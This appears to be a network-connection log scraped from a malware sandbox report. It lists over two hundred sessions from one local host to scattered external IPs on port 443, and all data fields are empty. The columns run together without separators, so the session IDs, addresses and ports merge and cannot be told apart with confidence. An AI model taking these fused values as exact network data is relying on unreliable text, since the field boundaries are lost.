                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19503192.168.2.2337796139.100.21.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19504192.168.2.2335876126.92.103.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19505192.168.2.2334784218.193.39.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19506192.168.2.233747694.215.209.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19507192.168.2.2338768175.85.182.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19508192.168.2.236018271.23.198.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19509192.168.2.2350568196.65.114.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19510192.168.2.2346124164.12.13.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19511192.168.2.235419464.37.164.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19512192.168.2.233339846.5.85.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19513192.168.2.2333598149.119.35.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19514192.168.2.233702061.129.119.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19515192.168.2.235200090.71.232.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19516192.168.2.2351360212.218.183.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19517192.168.2.2358128188.40.185.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19518192.168.2.2346036137.79.76.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19519192.168.2.2354654190.112.84.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19520192.168.2.2343236180.156.101.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19521192.168.2.2360972113.99.69.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19522192.168.2.234497489.114.76.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19523192.168.2.234275872.7.115.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19524192.168.2.234704288.44.178.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19525192.168.2.2335294188.47.33.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19526192.168.2.234696260.40.153.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19527192.168.2.233414238.30.112.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19528192.168.2.2349628208.126.172.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19529192.168.2.235881089.130.122.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19530192.168.2.235499412.84.161.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19531192.168.2.234113846.246.35.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19532192.168.2.2336804157.110.53.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19533192.168.2.2345730179.83.230.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19534192.168.2.2360316112.213.109.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19535192.168.2.2349888177.48.170.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19536192.168.2.2336890177.203.63.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19537192.168.2.2340610107.114.36.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19538192.168.2.2347352131.243.167.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19539192.168.2.2348596186.4.129.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19540192.168.2.2350892177.57.49.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19541192.168.2.234278086.207.191.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19542192.168.2.2341966188.134.238.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19543192.168.2.2347908166.172.91.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19544192.168.2.236030696.90.95.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19545192.168.2.2342274122.4.243.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19546192.168.2.23589588.90.64.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19547192.168.2.2356646187.207.93.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19548192.168.2.2341216161.200.153.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19549192.168.2.2337620222.114.158.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19550192.168.2.2353476206.52.86.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19551192.168.2.2357540124.188.159.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19552192.168.2.233279662.94.16.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19553192.168.2.235215046.108.245.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19554192.168.2.2352002176.80.105.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19555192.168.2.235663050.72.53.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19556192.168.2.2342386181.175.159.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19557192.168.2.233309053.168.11.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19558192.168.2.2348834109.232.140.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19559192.168.2.2336370204.23.80.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19560192.168.2.2342958104.67.74.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19561192.168.2.233483232.239.126.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19562192.168.2.2345534103.49.218.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19563192.168.2.2354770209.98.119.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19564192.168.2.233860627.67.54.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19565192.168.2.2345270182.155.205.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19566192.168.2.233717897.208.176.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19567192.168.2.233387271.218.126.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19568192.168.2.233894824.254.87.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19569192.168.2.235379284.69.60.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19570192.168.2.23592109.204.183.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19571192.168.2.235296053.20.200.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19572192.168.2.234151072.51.37.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19573192.168.2.2345584121.30.78.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19574192.168.2.2360812145.175.139.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19575192.168.2.235839460.127.157.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19576192.168.2.234860649.20.235.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19577192.168.2.2334576218.10.15.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19578192.168.2.2351138207.120.255.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19579192.168.2.234230884.170.139.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19580192.168.2.2347456211.30.193.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19581192.168.2.2346730173.127.224.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19582192.168.2.2334608117.199.94.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19583192.168.2.2341402183.219.130.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19584192.168.2.235806064.54.172.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19585192.168.2.235065647.92.200.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19586192.168.2.2345888222.64.9.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19587192.168.2.234774065.107.145.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19588192.168.2.2348200173.19.146.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19589192.168.2.2348246208.82.170.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19590192.168.2.2354818114.227.115.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19591192.168.2.2339798195.86.56.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19592192.168.2.233778618.77.168.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19593192.168.2.234909277.132.175.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19594192.168.2.234376240.255.29.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19595192.168.2.234605053.27.32.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19596192.168.2.235139420.163.195.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19597192.168.2.2351692131.212.10.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19598192.168.2.2359920154.28.128.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19599192.168.2.2344098139.134.112.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19600192.168.2.233431650.77.44.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19601192.168.2.2334182107.222.16.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19602192.168.2.2344602119.51.58.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19603192.168.2.2360940126.55.45.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19604192.168.2.2337466159.125.23.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19605192.168.2.2342922158.2.153.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19606192.168.2.2353928108.245.101.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19607192.168.2.2351082161.228.208.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19608192.168.2.235437223.86.72.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19609192.168.2.234980449.45.27.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19610192.168.2.2349606178.89.16.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19611192.168.2.2334584170.152.133.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19612192.168.2.2360870103.27.171.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19613192.168.2.233384835.106.215.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19614192.168.2.2351938146.84.227.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19615192.168.2.234263894.32.89.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19616192.168.2.234154498.122.56.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19617192.168.2.2348762148.163.44.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19618192.168.2.2347964170.114.14.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19619192.168.2.235267496.146.53.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19620192.168.2.235725863.27.18.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19621192.168.2.233891043.243.84.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19622192.168.2.2346862165.191.49.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19623192.168.2.2336014107.138.144.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19624192.168.2.2359692105.220.135.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19625192.168.2.233647047.50.90.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19626192.168.2.233905692.13.209.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19627192.168.2.2360856146.22.121.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19628192.168.2.235192673.32.238.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19629192.168.2.2343836112.11.126.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19630192.168.2.2354286161.171.60.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19631192.168.2.2358440198.51.205.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19632192.168.2.234146243.121.65.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19633192.168.2.233627884.164.81.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19634192.168.2.235866866.55.164.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19635192.168.2.2348870169.13.176.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19636192.168.2.2337936187.125.15.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19637192.168.2.233889099.136.9.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19638192.168.2.2350672143.164.156.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19639192.168.2.2360884210.151.84.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19640192.168.2.2359712177.192.121.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19641192.168.2.2338212177.204.69.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19642192.168.2.2349928142.132.123.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19643192.168.2.2334394170.15.150.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19644192.168.2.2343182145.78.225.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19645192.168.2.2334018151.214.142.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19646192.168.2.2349114188.121.211.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19647192.168.2.236024893.168.103.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19648192.168.2.2360824167.76.119.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19649192.168.2.2335666216.16.175.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19650192.168.2.2342090141.59.231.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19651192.168.2.2338020104.41.37.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19652192.168.2.235135474.139.122.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19653192.168.2.2359096124.159.72.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19654192.168.2.235890073.127.44.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19655192.168.2.2333616113.121.42.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19656192.168.2.2356822194.127.233.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19657192.168.2.234844878.125.150.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19658192.168.2.2337752148.183.251.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19659192.168.2.2334844167.100.251.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19660192.168.2.2352116165.174.79.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19661192.168.2.235379863.124.18.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19662192.168.2.2356400196.164.226.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19663192.168.2.2356266208.57.204.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19664192.168.2.2356026110.96.149.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19665192.168.2.2338802116.198.235.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19666192.168.2.2349548159.51.74.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19667192.168.2.2353320115.163.213.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19668192.168.2.2347222129.171.95.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19669192.168.2.235337441.29.148.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19670192.168.2.2344914175.142.85.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19671192.168.2.2359102200.254.120.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19672192.168.2.2339130135.213.92.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19673192.168.2.233900434.181.252.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19674192.168.2.235611279.34.59.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19675192.168.2.2353976110.181.93.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19676192.168.2.2338732138.181.20.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19677192.168.2.234906274.232.106.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19678192.168.2.2353820108.154.107.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19679192.168.2.235581285.44.161.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19680192.168.2.2353152217.81.9.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19681192.168.2.2332824197.37.26.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19682192.168.2.23554601.120.172.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19683192.168.2.2354764206.254.128.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19684192.168.2.2340558172.14.221.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19685192.168.2.2349712213.0.134.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19686192.168.2.2360172168.161.232.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19687192.168.2.2356264198.126.131.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19688192.168.2.2342384204.171.158.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19689192.168.2.2347970102.196.62.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19690192.168.2.2347926155.177.146.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19691192.168.2.2353416178.0.30.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19692192.168.2.2340878101.90.225.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19693192.168.2.2335150158.83.144.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19694192.168.2.2348820195.228.96.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19695192.168.2.23583269.217.255.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19696192.168.2.235891254.130.162.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19697192.168.2.2337080201.3.197.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19698192.168.2.2348758196.12.9.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19699192.168.2.234649259.155.192.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19700192.168.2.235414823.182.168.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19701192.168.2.2348368101.154.37.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19702192.168.2.2360964181.22.237.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19703192.168.2.2345384213.155.155.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19704192.168.2.2356216114.142.37.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19705192.168.2.235441812.229.130.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19706192.168.2.235464412.135.59.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19707192.168.2.2345892205.247.111.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19708192.168.2.2346484185.98.37.186443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19709192.168.2.235277473.52.182.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19710192.168.2.2349736201.252.20.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19711192.168.2.235132857.140.36.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19712192.168.2.2333430108.0.169.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19713192.168.2.2351898159.23.38.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19714192.168.2.235396648.93.7.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19715192.168.2.2342158105.89.21.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19716192.168.2.2343640135.24.111.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19717192.168.2.233708479.161.163.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19718192.168.2.233845888.76.82.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19719192.168.2.236036654.71.78.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19720192.168.2.23465862.216.51.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19721192.168.2.2347772101.71.73.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19722192.168.2.233610647.167.239.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19723192.168.2.2339194193.244.184.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
